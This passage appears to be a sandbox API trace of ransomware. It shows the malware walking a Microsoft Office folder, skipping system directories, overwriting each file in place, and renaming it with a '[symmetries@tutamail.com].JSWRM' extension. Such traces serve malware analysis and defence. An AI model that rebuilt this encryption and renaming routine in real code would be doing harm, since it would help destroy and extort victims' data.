Office\\root\\Office16\\PUBWIZ\\SIGN.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\sign.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0143.402] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10932) returned 1 [0143.402] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.402] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x2ab0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x2ab0, lpOverlapped=0x0) returned 1 [0143.404] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.404] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x2ab0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x2ab0, lpOverlapped=0x0) returned 1 [0143.405] CloseHandle (hObject=0x238) returned 1 [0143.405] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\SIGN.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\sign.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\SIGN.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\sign.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0143.406] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x235000fc, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x235000fc, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x237aeb7f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xbb82, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="SIGN98.POC", cAlternateFileName="")) returned 1 [0143.406] lstrcmpiW (lpString1="SIGN98.POC", lpString2=".") returned 1 [0143.406] lstrcmpiW (lpString1="SIGN98.POC", lpString2="..") returned 1 [0143.406] lstrcmpiW (lpString1="SIGN98.POC", lpString2="...") returned 1 [0143.406] lstrcmpiW (lpString1="SIGN98.POC", lpString2="windows") returned -1 [0143.406] lstrcmpiW (lpString1="SIGN98.POC", lpString2="recovery") returned 1 [0143.406] lstrcmpiW (lpString1="SIGN98.POC", lpString2="perflogs") returned 1 [0143.406] lstrcmpiW (lpString1="SIGN98.POC", lpString2="documents and settings") returned 1 [0143.406] lstrcmpiW (lpString1="SIGN98.POC", lpString2="$RECYCLE.BIN") returned 1 [0143.406] lstrcmpiW (lpString1="SIGN98.POC", lpString2="system volume information") returned -1 [0143.406] lstrcmpiW (lpString1="SIGN98.POC", lpString2="msocache") returned 1 [0143.406] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SIGN98.POC", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0143.406] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SIGN98.POC", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SIGN98.POC", lpUsedDefaultChar=0x0) returned 10 [0143.406] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SIGN98.POC", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0143.406] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SIGN98.POC", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SIGN98.POC", lpUsedDefaultChar=0x0) returned 10 [0143.406] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0143.406] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0143.406] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\SIGN98.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\sign98.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0143.408] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=48002) returned 1 [0143.408] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.408] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0xbb80, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0xbb80, lpOverlapped=0x0) returned 1 [0143.413] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.413] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xbb80, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0xbb80, lpOverlapped=0x0) returned 1 [0143.413] CloseHandle (hObject=0x238) returned 1 [0143.413] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\SIGN98.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\sign98.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\SIGN98.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\sign98.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0143.414] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x23598a6d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x23598a6d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x23598a6d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6d6c, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="SIGNHM.POC", cAlternateFileName="")) returned 1 [0143.414] lstrcmpiW (lpString1="SIGNHM.POC", lpString2=".") returned 1 [0143.414] lstrcmpiW (lpString1="SIGNHM.POC", lpString2="..") returned 1 [0143.414] lstrcmpiW (lpString1="SIGNHM.POC", lpString2="...") returned 1 [0143.414] lstrcmpiW (lpString1="SIGNHM.POC", lpString2="windows") returned -1 [0143.414] lstrcmpiW (lpString1="SIGNHM.POC", lpString2="recovery") returned 1 [0143.414] lstrcmpiW (lpString1="SIGNHM.POC", lpString2="perflogs") returned 1 [0143.414] lstrcmpiW (lpString1="SIGNHM.POC", lpString2="documents and settings") returned 1 [0143.414] lstrcmpiW (lpString1="SIGNHM.POC", lpString2="$RECYCLE.BIN") returned 1 [0143.414] lstrcmpiW (lpString1="SIGNHM.POC", lpString2="system volume information") returned -1 [0143.414] lstrcmpiW (lpString1="SIGNHM.POC", lpString2="msocache") returned 1 [0143.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SIGNHM.POC", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0143.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SIGNHM.POC", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SIGNHM.POC", lpUsedDefaultChar=0x0) returned 10 [0143.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SIGNHM.POC", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0143.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SIGNHM.POC", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SIGNHM.POC", lpUsedDefaultChar=0x0) returned 10 [0143.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0143.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0143.414] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\SIGNHM.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\signhm.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0143.415] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=28012) returned 1 [0143.415] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.415] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x6d60, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x6d60, lpOverlapped=0x0) returned 1 [0143.418] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.418] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x6d60, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x6d60, lpOverlapped=0x0) returned 1 [0143.418] CloseHandle (hObject=0x238) returned 1 [0143.419] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\SIGNHM.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\signhm.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\SIGNHM.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\signhm.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0143.420] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x235000fc, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x235000fc, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x235000fc, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x760e, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="SNIPE.POC", cAlternateFileName="")) returned 1 [0143.420] lstrcmpiW (lpString1="SNIPE.POC", lpString2=".") returned 1 [0143.420] lstrcmpiW (lpString1="SNIPE.POC", lpString2="..") returned 1 [0143.420] lstrcmpiW (lpString1="SNIPE.POC", lpString2="...") returned 1 [0143.420] lstrcmpiW (lpString1="SNIPE.POC", lpString2="windows") returned -1 [0143.420] lstrcmpiW (lpString1="SNIPE.POC", lpString2="recovery") returned 1 [0143.420] lstrcmpiW (lpString1="SNIPE.POC", lpString2="perflogs") returned 1 [0143.420] lstrcmpiW (lpString1="SNIPE.POC", lpString2="documents and settings") returned 1 [0143.420] lstrcmpiW (lpString1="SNIPE.POC", lpString2="$RECYCLE.BIN") returned 1 [0143.420] lstrcmpiW (lpString1="SNIPE.POC", lpString2="system volume information") returned -1 [0143.420] lstrcmpiW (lpString1="SNIPE.POC", lpString2="msocache") returned 1 [0143.420] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SNIPE.POC", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0143.420] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SNIPE.POC", cchWideChar=9, lpMultiByteStr=0x345ebd8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SNIPE.POC", lpUsedDefaultChar=0x0) returned 9 [0143.420] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SNIPE.POC", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0143.420] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SNIPE.POC", cchWideChar=9, lpMultiByteStr=0x345eba8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SNIPE.POC", lpUsedDefaultChar=0x0) returned 9 [0143.420] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0143.420] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0143.420] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\SNIPE.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\snipe.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0143.421] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=30222) returned 1 [0143.421] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.421] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x7600, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x7600, lpOverlapped=0x0) returned 1 [0143.424] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.424] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x7600, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x7600, lpOverlapped=0x0) returned 1 [0143.425] CloseHandle (hObject=0x238) returned 1 [0143.425] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\SNIPE.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\snipe.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\SNIPE.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\snipe.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0143.426] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x234d9efd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x234d9efd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2373c469, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5f93b, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="STORYBB.DPV", cAlternateFileName="")) returned 1 [0143.426] lstrcmpiW (lpString1="STORYBB.DPV", lpString2=".") returned 1 [0143.426] lstrcmpiW (lpString1="STORYBB.DPV", lpString2="..") returned 1 [0143.426] lstrcmpiW (lpString1="STORYBB.DPV", lpString2="...") returned 1 [0143.426] lstrcmpiW (lpString1="STORYBB.DPV", lpString2="windows") returned -1 [0143.426] lstrcmpiW (lpString1="STORYBB.DPV", lpString2="recovery") returned 1 [0143.426] lstrcmpiW (lpString1="STORYBB.DPV", lpString2="perflogs") returned 1 [0143.426] lstrcmpiW (lpString1="STORYBB.DPV", lpString2="documents and settings") returned 1 [0143.426] lstrcmpiW (lpString1="STORYBB.DPV", lpString2="$RECYCLE.BIN") returned 1 [0143.426] lstrcmpiW (lpString1="STORYBB.DPV", lpString2="system volume information") returned -1 [0143.426] lstrcmpiW (lpString1="STORYBB.DPV", lpString2="msocache") returned 1 [0143.426] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="STORYBB.DPV", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0143.426] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="STORYBB.DPV", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="STORYBB.DPV", lpUsedDefaultChar=0x0) returned 11 [0143.426] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="STORYBB.DPV", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0143.426] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="STORYBB.DPV", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="STORYBB.DPV", lpUsedDefaultChar=0x0) returned 11 [0143.426] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0143.426] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0143.426] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\STORYBB.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\storybb.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0143.427] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=391483) returned 1 [0143.427] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.427] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0143.440] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.440] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0143.440] CloseHandle (hObject=0x238) returned 1 [0143.440] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\STORYBB.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\storybb.dpv"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\STORYBB.DPV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\storybb.dpv.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0143.441] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x23526361, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x23526361, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2354c5c9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7d36, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="STORYBB.POC", cAlternateFileName="")) returned 1 [0143.441] lstrcmpiW (lpString1="STORYBB.POC", lpString2=".") returned 1 [0143.441] lstrcmpiW (lpString1="STORYBB.POC", lpString2="..") returned 1 [0143.441] lstrcmpiW (lpString1="STORYBB.POC", lpString2="...") returned 1 [0143.441] lstrcmpiW (lpString1="STORYBB.POC", lpString2="windows") returned -1 [0143.441] lstrcmpiW (lpString1="STORYBB.POC", lpString2="recovery") returned 1 [0143.441] lstrcmpiW (lpString1="STORYBB.POC", lpString2="perflogs") returned 1 [0143.441] lstrcmpiW (lpString1="STORYBB.POC", lpString2="documents and settings") returned 1 [0143.441] lstrcmpiW (lpString1="STORYBB.POC", lpString2="$RECYCLE.BIN") returned 1 [0143.441] lstrcmpiW (lpString1="STORYBB.POC", lpString2="system volume information") returned -1 [0143.441] lstrcmpiW (lpString1="STORYBB.POC", lpString2="msocache") returned 1 [0143.442] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="STORYBB.POC", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0143.442] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="STORYBB.POC", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="STORYBB.POC", lpUsedDefaultChar=0x0) returned 11 [0143.442] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="STORYBB.POC", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0143.442] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="STORYBB.POC", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="STORYBB.POC", lpUsedDefaultChar=0x0) returned 11 [0143.442] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0143.442] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0143.442] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\STORYBB.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\storybb.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0143.442] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=32054) returned 1 [0143.442] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.443] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x7d30, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x7d30, lpOverlapped=0x0) returned 1 [0143.448] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.448] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x7d30, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x7d30, lpOverlapped=0x0) returned 1 [0143.448] CloseHandle (hObject=0x238) returned 1 [0143.448] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\STORYBB.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\storybb.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\STORYBB.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\storybb.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0143.449] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x23526361, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x23526361, ftLastAccessTime.dwHighDateTime=0x1d327e8, 